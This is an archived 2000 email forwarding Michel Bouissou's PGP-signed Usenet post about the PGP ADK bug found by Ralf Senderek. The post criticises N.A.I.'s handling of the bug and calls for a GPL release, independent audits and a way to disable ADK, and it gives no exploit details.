27 August 2000.
Date: Sun, 27 Aug 2000 15:17:38 +0200 From: pgpenfrancais <pgpenfrancais@bigfoot.com> To: jya@pipeline.com CC: michel@bouissou.net Subject: PGP in GPL to restore confidence? John, FYI, this very interesting message of Michel Bouissou, a french crypto-activist. Cheers, -- pgpenfrancais@bigfoot.com PGP en francais http://www.geocities.com/SiliconValley/Bay/9648/news.htm **** From: "Michel Bouissou" <michel@bouissou.net> Newsgroups: alt.security.pgp,comp.security.pgp.discuss,sci.crypt Subject: PGP ADK Bug: What we expect from N.A.I. Date: Sun, 27 Aug 2000 11:13:49 +0200 -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 The disastrous ADK bug recently discovered by Ralf Senderek in versions 5.x and 6.x of PGP has greatly compromised the trust that all of us crypto and privacy activists had in N.A.I. PGP. In this message, I express not only my personal opinion, but as well the opinion of several crypto and privacy activists, long-time PGP supporters in France. This bug is the most serious and threatening one ever discovered in PGP since its beginning. Although N.A.I. quickly reacted to this bug by scanning and fixing their keyservers, publishing a new PGP 6.5.8 version supposed to be immune to the bug within 48 hours after its discovery, and also released a PGPrepair program which is supposed to clean forged public keys from keyrings, this still is far from enough. (We write "supposed" not because we distrust the efforts made by N.A.I., but because we estimate that these solutions cannot have been tested enough in this short timeframe to put full confidence into them). We received information from N.A.I. stating that these countermeasures were the first steps taken in emergency, and we acknowledge that they shown quick and reactive and there was not much more that they could have done in such a short timeframe. We understand from N.A.I. employees statement that more comprehensive and definitive solutions are yet to come and are looking forward for these solutions. Yet, we regret that N.A.I. and / or Phil Zimmermann didn't release so far clearer explanations about what they thought of this bug and its cause and consequences on a technical standpoint. The fact that this bug can allow messages to be encrypted to somebody (attacker) different than the intended message recipients makes it one of the most disastrous things that can happen to a public-key cryptosystem. This bug being related to the "ADK / ARR" feature in PGP makes the issue still hotter, as this ADK feature has been contested and disapproved from the beginning by the vast majority of PGP supporters, as well as a number of crypto specialists. In any case, this "ADK / ARR" feature is a very sensible thing, as incoporating such features in a cryptosystem creates one possible weakness and attack path. Ralf's discovery recently proved we were right being worried about it. This ADK system being so sensible, we would have expected N.A.I. to have put the highest care in implementing, testing, securing and documenting it. Unfortunately, Ralf's work and our own tests proved this wasn't the case. => The bug exists, can easily be exploited. This has been largely debated these last days. => The "warning" messages do not behave as one would expect by reading the manuals and options explanations. => The whole ADK concept and implementation is not explained nor discussed in the PGP Freeware manual, maintaining ignorance and confusion about sensible things which should be made very clear. All this proves that this wasn't properly done, and, quoting Ralf Senderek last public note: <<<<< >This is not a bug, this is a scandal, because NAI put ADKs into PGP >without caring about simple manipulations. Obviously there has >never been a well thought-out security strategy and most of the >relevant information the public got from NAI concerning ADKs was >completely untrue as my >experiments reveal. >>>>> We regret to say that we must share and approve Ralf point of view about this. This weakness discovered in the v4 signature mechanism raises the issues of possible other weaknesses that might have been introduced in PGP when PGP5 was released, because it proves that things which should have been carefully checked and designed were not. And such a weakness stayed unnoticed for several years. In light of this, we must acknowledge that Ralf Senderek advice to trust only PGP 2.6.x version makes sense. Seeing that, and seeing that several small but very visible bugs have remained in the PGP G.U.I for a very long time (such as a bug in the display of the main PGPkeys window, bug in the display of Keyserver search results...) we really have to worry about the overall quality and security of the PGP products. Consequently, we suggest that: - - N.A.I. should put the core of PGPFreeware under GNU/GPL license. This would probably have no or little impact on the ability of N.A.I. to keep producing and selling commercial PGP versions and related security services, and would help much in restoring confidence. - - N.A.I. should start cooperating, and not competing, with current PGP-compatible cryptosystems developments such as GnuPG. - - N.A.I. should urgently have the current PGP versions and key formats reviewed by independent competent, and well-known cryptographers, and should ask them to publish an independent audit report about their findings. - - N.A.I. should communicate very clearly about the ADK issue, and the possible consequences of the existence of a non-hashed area in the v4 signature format. Although details about this signature format may be buried somewhere in a technical RFC or the like, N.A.I. should publicly discuss this signature format and the reason why such non-hashed areas were put into it. - - N.A.I. should try its best to explain how this bug can have been introduced unnoticed in PGP, and why the implementation of the ADK feature has not been accompanied with security controls that meet the quality standards expected for such a life-critical software. - - N.A.I. should take appropriate measures to really kick this problem off. If this means having to abandon the current DH/DSS keys or signature format and developing a new, more robust format, this should be undertaken according to indenpendant and competent cryptographers advice. - - N.A.I. should stop bundling PGP with other "security" features such as a VPN or firewall or intrusion detector that have nothing to do with the PGP core. PGP is PGP and can may be accompanied by PGPdisk. The rest has nothing to do with PGP and could be sold by N.A.I. in different, separated software packages if they want. The more unnecessary and bulky things are included with PGP, the bigger PGP grows, the harder it becomes to review and control, and higher becomes the risk that security-threatening bugs remain unnoticed. - - N.A.I. should integrate into the next PGP releases an option to globally desactivate ADK encryption, even if this means refusing to encrypt anything to a recipient key which has an attached ADK. - - And we wish that N.A.I. should release a freeware PGP version which is completely ADK-free. Should N.A.I. choose to follow some of these advices, this would greatly help in restoring confidence that has much suffered from this regrettable event. Should N.A.I. choose to ignore these comments, this would surely lead many people to distrust the PGP software and move on to new systems such as GnuPG, which many of us are already seriously considering. michel@bouissou.net -----BEGIN PGP SIGNATURE----- Version: PGPfreeware 6.5.8 for non-commercial use <http://www.pgp.com> Comment: Corrigez le bug PGP ADK. Installez PGP 6.5.8 ou plus recent. iQA/AwUBOajNvY7YarFcK+6PEQIsfgCeItaFxuENITYwHyarFt6h3oX4dwwAn305 MezqixhI0VhEObdogHcJU3rO =Jkhe -----END PGP SIGNATURE----- ****